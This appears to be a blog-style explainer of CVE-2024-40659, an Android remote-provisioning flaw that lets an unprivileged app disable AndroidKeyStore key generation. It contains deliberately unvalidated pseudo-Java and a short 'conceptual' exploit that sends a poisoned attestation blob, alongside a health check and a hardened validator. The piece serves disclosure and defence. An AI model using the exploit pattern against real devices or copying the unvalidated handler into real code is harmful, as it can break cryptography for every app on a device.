Android’s security model depends heavily on the integrity and isolation of the cryptographic keys managed by the AndroidKeyStore system. CVE-2024-40659 describes a flaw that lets a local app permanently disable AndroidKeyStore key generation on a device, and it requires neither user interaction nor any special permission.
This post breaks the issue down in plain language, with illustrative code snippets, references, and a hypothetical exploit demonstration.
- Core Issue: Improper input validation when processing attestation key data.
- Consequence: A local app can corrupt or overwrite attestation keys used by all installed apps, after which AndroidKeyStore refuses further key generation requests.
The getRegistration Function
Within the Android Open Source Project (AOSP), RemoteProvisioningService.java implements the framework side of remote key provisioning, the mechanism that supplies attestation key material to the device. The function named in the CVE description is getRegistration, which is where attestation key data is validated and updated.
If that function expects a strict format or specific parameters but the checks are missing or weak, a malicious app can send a malformed registration request, and the underlying keystore accepts and stores corrupted attestation keys.
Simplified Code Snippet (Pseudo-Java)
// Inside RemoteProvisioningService.java (illustrative pseudo-Java, not the actual AOSP source)
import android.os.Bundle;
import java.security.KeyStore;
import javax.crypto.spec.SecretKeySpec;

public void getRegistration(Bundle input) throws Exception {
    // BAD: no caller check and no validation of the alias or the blob
    String alias = input.getString("attestationKeyAlias");
    byte[] keyData = input.getByteArray("attestationKeyBlob");
    // The code proceeds without any sanity checks: whatever the caller sent
    // is stored under whatever alias the caller chose
    KeyStore keystore = KeyStore.getInstance("AndroidKeyStore");
    keystore.load(null);
    keystore.setEntry(alias,
            new KeyStore.SecretKeyEntry(new SecretKeySpec(keyData, "AES")), null);
    // ...further processing
}
Exploit Path
1. Malicious App: The attacker crafts a specially-formatted intent or API call, providing an invalid or poisoned attestation key blob.
2. Reachable Without Privileges: No additional permissions are required; the app needs neither root nor system privileges.
3. Keystore Corruption: These poisoned keys are accepted and registered under critical aliases, effectively invalidating all future key generation requests.
4. Permanent DoS: Once the keys are corrupted and stored, AndroidKeyStore will refuse to generate or provision new cryptographic keys – even a reboot or uninstall of the malicious app does not fix the issue (unless the device is wiped).
Exploit Example
*This is a conceptual and educational demonstration only.*
// Malicious app code (conceptual): disable AndroidKeyStore key generation
import android.content.Context;
import android.content.Intent;
import android.os.Bundle;

public void poisonAttestationKey(Context context) {
    Intent inject = new Intent();
    // Component name is this post's hypothetical stand-in, not a real AOSP component
    inject.setClassName("com.android.remoteprovisioningservice",
            "com.android.remoteprovisioningservice.RemoteProvisioningService");
    Bundle payload = new Bundle();
    payload.putString("attestationKeyAlias", "default_key");
    payload.putByteArray("attestationKeyBlob", createBadBlob());
    // Sending the payload to the vulnerable service
    inject.putExtras(payload);
    context.startService(inject);
}

// Helper: generate a fake/corrupt key blob
private byte[] createBadBlob() {
    return new byte[] {0x00, 0x01, 0x02, 0x03}; // invalid or truncated
}
After execution, any app (even legitimate ones) trying to generate new keys with AndroidKeyStore will hit failures.
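A quick way to tell whether a device is in the broken state described above is to ask AndroidKeyStore for a fresh attested key and read back its certificate chain. The following is an added example, not code from this post or from AOSP; the alias and the challenge bytes are arbitrary choices, and the method has to run inside an app (an Activity, a Service, or an instrumentation test), since AndroidKeyStore is only reachable from an Android process.

```java
import android.security.keystore.KeyGenParameterSpec;
import android.security.keystore.KeyProperties;
import java.security.KeyPairGenerator;
import java.security.KeyStore;
import java.security.cert.Certificate;
import java.security.cert.X509Certificate;

/** Probes AndroidKeyStore key generation and attestation. Added example, not AOSP code. */
public final class KeystoreHealthCheck {
    // Arbitrary alias for the probe key; the entry is deleted again at the end.
    private static final String ALIAS = "rkp_health_probe";

    public enum Result { OK, KEYGEN_FAILED, ATTESTATION_MISSING }

    /** @param challenge caller-chosen bytes that end up in the attestation extension. */
    public static Result run(byte[] challenge) {
        KeyStore ks = null;
        try {
            ks = KeyStore.getInstance("AndroidKeyStore");
            ks.load(null);
            ks.deleteEntry(ALIAS); // no error if the alias does not exist

            // Ask for an attested EC P-256 signing key. setAttestationChallenge forces
            // the keystore to produce an attestation certificate chain, which exercises
            // the provisioned attestation key material, not just local key generation.
            KeyPairGenerator kpg = KeyPairGenerator.getInstance(
                    KeyProperties.KEY_ALGORITHM_EC, "AndroidKeyStore");
            kpg.initialize(new KeyGenParameterSpec.Builder(
                    ALIAS, KeyProperties.PURPOSE_SIGN | KeyProperties.PURPOSE_VERIFY)
                    .setDigests(KeyProperties.DIGEST_SHA256)
                    .setAttestationChallenge(challenge)
                    .build());
            kpg.generateKeyPair();

            // A healthy device returns the leaf plus at least one issuer certificate.
            // A missing chain, or a lone self-signed leaf, means attestation was not produced.
            Certificate[] chain = ks.getCertificateChain(ALIAS);
            if (chain == null || chain.length < 2 || !(chain[0] instanceof X509Certificate)) {
                return Result.ATTESTATION_MISSING;
            }
            return Result.OK;
        } catch (Exception e) {
            // ProviderException, InvalidAlgorithmParameterException and friends all mean
            // the keystore refused to create the key: the symptom this post describes.
            return Result.KEYGEN_FAILED;
        } finally {
            if (ks != null) {
                try { ks.deleteEntry(ALIAS); } catch (Exception ignored) { }
            }
        }
    }
}
```

Call KeystoreHealthCheck.run(new byte[] {1, 2, 3, 4}) from a debug build or an instrumentation test. OK means key generation and attestation both work; KEYGEN_FAILED is the condition the exploit path above leaves the device in, and ATTESTATION_MISSING points at the provisioned attestation material rather than at key generation itself.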
Real-World Impact
- App Breakage: Banking, messaging, and security apps relying on AndroidKeyStore for cryptographic operations may suddenly fail.
- No Quick Fix: The condition persists after device reboots and app uninstalls. In most cases, only a factory reset restores functionality.
Google patched this in the September 2024 Android Security Bulletin:
- Input Validation: The vulnerable API now strictly checks the attestation key alias, signatures, and blob format, preventing rogue data from being registered.
- Further Restrictions: Internal APIs have been protected against unauthorized or malformed requests.
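To make the two fix bullets concrete, here is a hardened counterpart of the pseudo-Java shown under "The getRegistration Function". It is an added example, not the AOSP patch: the Bundle extras follow the post's snippet, while the permission name, the alias policy, and the assumption that a registration blob is an X.509 certificate chain are my own. Every check runs before anything touches the keystore, so a rejected request cannot leave a half-written entry behind.

```java
import android.content.Context;
import android.os.Binder;
import android.os.Bundle;
import android.os.Process;
import java.io.ByteArrayInputStream;
import java.security.cert.Certificate;
import java.security.cert.CertificateException;
import java.security.cert.CertificateFactory;
import java.security.cert.X509Certificate;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Pattern;

/**
 * Hardened counterpart of the post's getRegistration pseudo-code.
 * Added example, not the AOSP fix; permission name and alias policy are hypothetical.
 */
public final class RegistrationGuard {
    // Assumption: attestation key aliases use a closed character set and bounded length.
    private static final Pattern ALIAS = Pattern.compile("[a-z0-9_]{1,64}");
    private static final int MAX_BLOB_BYTES = 64 * 1024;
    // Hypothetical signature-level permission that only platform apps could hold.
    private static final String REGISTER_PERMISSION =
            "com.example.permission.REGISTER_ATTESTATION_KEY";

    private final Context context;

    public RegistrationGuard(Context context) { this.context = context; }

    /** Returns the parsed chain, or throws before any keystore state is touched. */
    public List<X509Certificate> validateRegistration(Bundle input) throws CertificateException {
        // 1. Caller check. Binder.getCallingUid() is the kernel-reported UID of the peer,
        //    so a third-party app cannot spoof it. Only system_server or a holder of the
        //    (hypothetical) signature permission gets past this point.
        if (Binder.getCallingUid() != Process.SYSTEM_UID) {
            context.enforceCallingPermission(REGISTER_PERMISSION,
                    "caller may not register attestation keys");
        }

        // 2. Alias check: a caller cannot name, and therefore cannot overwrite, an
        //    entry outside the expected pattern.
        String alias = input.getString("attestationKeyAlias");
        if (alias == null || !ALIAS.matcher(alias).matches()) {
            throw new IllegalArgumentException("bad attestation key alias");
        }

        // 3. Blob format: bounded size, and it must parse as a non-empty X.509 chain.
        byte[] blob = input.getByteArray("attestationKeyBlob");
        if (blob == null || blob.length == 0 || blob.length > MAX_BLOB_BYTES) {
            throw new IllegalArgumentException("bad attestation key blob size");
        }
        CertificateFactory cf = CertificateFactory.getInstance("X.509");
        List<X509Certificate> chain = new ArrayList<>();
        for (Certificate c : cf.generateCertificates(new ByteArrayInputStream(blob))) {
            chain.add((X509Certificate) c);
        }
        if (chain.isEmpty()) {
            throw new CertificateException("blob contains no certificates");
        }

        // 4. Signature check: each certificate must verify under the next one up, so a
        //    truncated or spliced chain (like the 4-byte blob in the exploit example)
        //    is rejected here rather than stored.
        for (int i = 0; i + 1 < chain.size(); i++) {
            try {
                chain.get(i).verify(chain.get(i + 1).getPublicKey());
            } catch (Exception e) {
                throw new CertificateException("chain link " + i + " does not verify", e);
            }
        }

        // Only after all checks pass would the original code call keystore.setEntry(...).
        return chain;
    }
}
```

The caller check is the one that matters most for this CVE's "no additional privileges" property: alias and blob validation stop corrupt data, but without a UID or permission gate any app could still replace a valid chain with a different valid chain. In a real deployment the last link of the chain would additionally be pinned to the expected root, which this example does not do.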
References
- Google Android Security Bulletin, September 2024
- CVE Record for CVE-2024-40659
- AOSP Commit Fix
Summary
CVE-2024-40659 is a stark reminder that improper input validation in a core Android service can cause a system-wide failure: a local, unprivileged app can permanently disable AndroidKeyStore key generation. Users should install the September 2024 (or later) security update promptly, and developers should review any code that registers or updates cryptographic key material.
Timeline
Published on: 09/11/2024 00:15:11 UTC
Last modified on: 11/04/2024 18:35:10 UTC